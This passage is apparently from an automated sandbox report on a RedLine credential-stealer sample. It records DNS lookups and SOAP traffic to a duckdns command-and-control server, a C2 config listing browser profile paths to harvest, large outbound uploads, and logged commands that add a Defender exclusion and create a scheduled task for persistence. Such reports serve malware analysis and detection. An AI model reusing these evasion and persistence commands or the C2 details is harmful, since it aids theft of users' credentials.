                                                                      Oct 7, 2024 11:29:32.985656023 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.985690117 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.985728979 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.985733032 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.985780001 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.985784054 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.985791922 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.985861063 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.985865116 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.985874891 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.985879898 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.985928059 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.985932112 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.985935926 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.985944986 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.985991001 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.985996008 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986046076 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986049891 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986102104 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986110926 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986139059 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986143112 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986157894 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986166954 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986222982 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986227036 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986300945 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986304998 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986341000 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986392021 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986396074 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986401081 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986473083 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986478090 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986556053 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986560106 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986592054 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986650944 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986700058 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986704111 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986764908 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986768961 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986831903 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986882925 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986886978 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986891985 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986910105 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.986937046 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987041950 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987046003 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987098932 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987102985 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987111092 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987149954 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987207890 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987211943 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987247944 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987288952 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987324953 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987379074 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987389088 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987433910 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987468004 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987478018 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987530947 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987535000 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987648964 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987653017 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987695932 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987782001 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987786055 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987790108 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987900972 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987904072 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987914085 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987919092 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.987924099 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.988013983 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.988018036 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.988032103 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.988356113 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.988359928 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.988363981 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.988373041 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.988377094 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.988380909 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.988387108 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.988390923 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.988399029 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.988403082 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.988466024 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.988475084 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.988519907 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.988903046 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.988908052 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.988912106 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.988915920 CEST342214972145.88.88.45192.168.2.8
                                                                      Oct 7, 2024 11:29:32.988919020 CEST342214972145.88.88.45192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 7, 2024 11:29:18.505965948 CEST | 55253 | 53 | 192.168.2.8 | 1.1.1.1
Oct 7, 2024 11:29:18.623950005 CEST | 53 | 55253 | 1.1.1.1 | 192.168.2.8
Oct 7, 2024 11:29:24.975972891 CEST | 50870 | 53 | 192.168.2.8 | 1.1.1.1
Oct 7, 2024 11:29:59.754066944 CEST | 53 | 60417 | 162.159.36.2 | 192.168.2.8
Oct 7, 2024 11:30:00.399574041 CEST | 53 | 51480 | 1.1.1.1 | 192.168.2.8

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 7, 2024 11:29:18.505965948 CEST | 192.168.2.8 | 1.1.1.1 | 0xb717 | Standard query (0) | billred229102.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 7, 2024 11:29:24.975972891 CEST | 192.168.2.8 | 1.1.1.1 | 0x2573 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 7, 2024 11:29:18.623950005 CEST | 1.1.1.1 | 192.168.2.8 | 0xb717 | No error (0) | billred229102.duckdns.org | | 45.88.88.45 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 11:29:24.983004093 CEST | 1.1.1.1 | 192.168.2.8 | 0x2573 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001) | false

• billred229102.duckdns.org:34221

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49707 | 45.88.88.45 | 34221 | 4468 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Oct 7, 2024 11:29:18.652009010 CEST | 252 | OUT | POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: billred229102.duckdns.org:34221
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Oct 7, 2024 11:29:19.248584032 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 7, 2024 11:29:19.382383108 CEST | 359 | IN | HTTP/1.1 200 OK
Content-Length: 212
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 07 Oct 2024 09:29:19 GMT
                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                      Oct 7, 2024 11:29:24.471509933 CEST | 235 | OUT | POST / HTTP/1.1
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                      Host: billred229102.duckdns.org:34221
                                                                      Content-Length: 144
                                                                      Expect: 100-continue
                                                                      Accept-Encoding: gzip, deflate
                                                                      Oct 7, 2024 11:29:24.708343983 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                      Oct 7, 2024 11:29:24.940987110 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                      Content-Length: 4744
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                      Date: Mon, 07 Oct 2024 09:29:24 GMT
                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      1 | 192.168.2.8 | 49710 | 45.88.88.45 | 34221 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Oct 7, 2024 11:29:21.691458941 CEST | 252 | OUT | POST / HTTP/1.1
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                      Host: billred229102.duckdns.org:34221
                                                                      Content-Length: 137
                                                                      Expect: 100-continue
                                                                      Accept-Encoding: gzip, deflate
                                                                      Connection: Keep-Alive
                                                                      Oct 7, 2024 11:29:22.279304981 CEST | 359 | IN | HTTP/1.1 200 OK
                                                                      Content-Length: 212
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                      Date: Mon, 07 Oct 2024 09:29:22 GMT
                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                      Oct 7, 2024 11:29:27.349452972 CEST | 235 | OUT | POST / HTTP/1.1
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                      Host: billred229102.duckdns.org:34221
                                                                      Content-Length: 144
                                                                      Expect: 100-continue
                                                                      Accept-Encoding: gzip, deflate
                                                                      Oct 7, 2024 11:29:27.589410067 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                      Content-Length: 4744
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                      Date: Mon, 07 Oct 2024 09:29:27 GMT
                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      2 | 192.168.2.8 | 49713 | 45.88.88.45 | 34221 | 4468 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Oct 7, 2024 11:29:27.907888889 CEST | 233 | OUT | POST / HTTP/1.1
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                      Host: billred229102.duckdns.org:34221
                                                                      Content-Length: 962483
                                                                      Expect: 100-continue
                                                                      Accept-Encoding: gzip, deflate
                                                                      Oct 7, 2024 11:29:29.517736912 CEST | 294 | IN | HTTP/1.1 200 OK
                                                                      Content-Length: 147
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                      Date: Mon, 07 Oct 2024 09:29:29 GMT
                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      3 | 192.168.2.8 | 49714 | 45.88.88.45 | 34221 | 4468 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Oct 7, 2024 11:29:29.525648117 CEST | 253 | OUT | POST / HTTP/1.1
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                      Host: billred229102.duckdns.org:34221
                                                                      Content-Length: 962475
                                                                      Expect: 100-continue
                                                                      Accept-Encoding: gzip, deflate
                                                                      Connection: Keep-Alive
                                                                      Oct 7, 2024 11:29:30.996665955 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                      Content-Length: 261
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                      Date: Mon, 07 Oct 2024 09:29:30 GMT
                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      4 | 192.168.2.8 | 49716 | 45.88.88.45 | 34221 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Oct 7, 2024 11:29:31.062418938 CEST | 233 | OUT | POST / HTTP/1.1
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                      Host: billred229102.duckdns.org:34221
                                                                      Content-Length: 962603
                                                                      Expect: 100-continue
                                                                      Accept-Encoding: gzip, deflate
                                                                      Oct 7, 2024 11:29:32.520620108 CEST | 294 | IN | HTTP/1.1 200 OK
                                                                      Content-Length: 147
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                      Date: Mon, 07 Oct 2024 09:29:32 GMT
                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      5 | 192.168.2.8 | 49721 | 45.88.88.45 | 34221 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Oct 7, 2024 11:29:32.528482914 CEST | 253 | OUT | POST / HTTP/1.1
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                      Host: billred229102.duckdns.org:34221
                                                                      Content-Length: 962595
                                                                      Expect: 100-continue
                                                                      Accept-Encoding: gzip, deflate
                                                                      Connection: Keep-Alive
                                                                      Oct 7, 2024 11:29:33.954171896 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                      Content-Length: 261
                                                                      Content-Type: text/xml; charset=utf-8
                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                      Date: Mon, 07 Oct 2024 09:29:33 GMT
                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>



                                                                      Target ID:0
                                                                      Start time:05:29:13
                                                                      Start date:07/10/2024
                                                                      Path:C:\Users\user\Desktop\13P2mxLaQk.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\13P2mxLaQk.exe"
                                                                      Imagebase:0xc70000
                                                                      File size:592'896 bytes
                                                                      MD5 hash:B47604CCFF9C611EAF0AA3D7443827B7
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:05:29:14
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe"
                                                                      Imagebase:0xaf0000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:4
                                                                      Start time:05:29:14
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6ee680000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:5
                                                                      Start time:05:29:14
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp2CA3.tmp"
                                                                      Imagebase:0xbb0000
                                                                      File size:187'904 bytes
                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:6
                                                                      Start time:05:29:14
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6ee680000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:7
                                                                      Start time:05:29:15
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                      Imagebase:0xdb0000
                                                                      File size:45'984 bytes
                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:8
                                                                      Start time:05:29:16
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6ee680000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:9
                                                                      Start time:05:29:16
                                                                      Start date:07/10/2024
                                                                      Path:C:\Users\user\AppData\Roaming\VWGccZGgix.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Roaming\VWGccZGgix.exe
                                                                      Imagebase:0x1a0000
                                                                      File size:592'896 bytes
                                                                      MD5 hash:B47604CCFF9C611EAF0AA3D7443827B7
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 58%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:10
                                                                      Start time:05:29:18
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                      Imagebase:0x7ff605670000
                                                                      File size:496'640 bytes
                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:11
                                                                      Start time:05:29:19
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp3EC3.tmp"
                                                                      Imagebase:0xbb0000
                                                                      File size:187'904 bytes
                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:12
                                                                      Start time:05:29:19
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6ee680000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:13
                                                                      Start time:05:29:19
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                      Imagebase:0x9f0000
                                                                      File size:45'984 bytes
                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
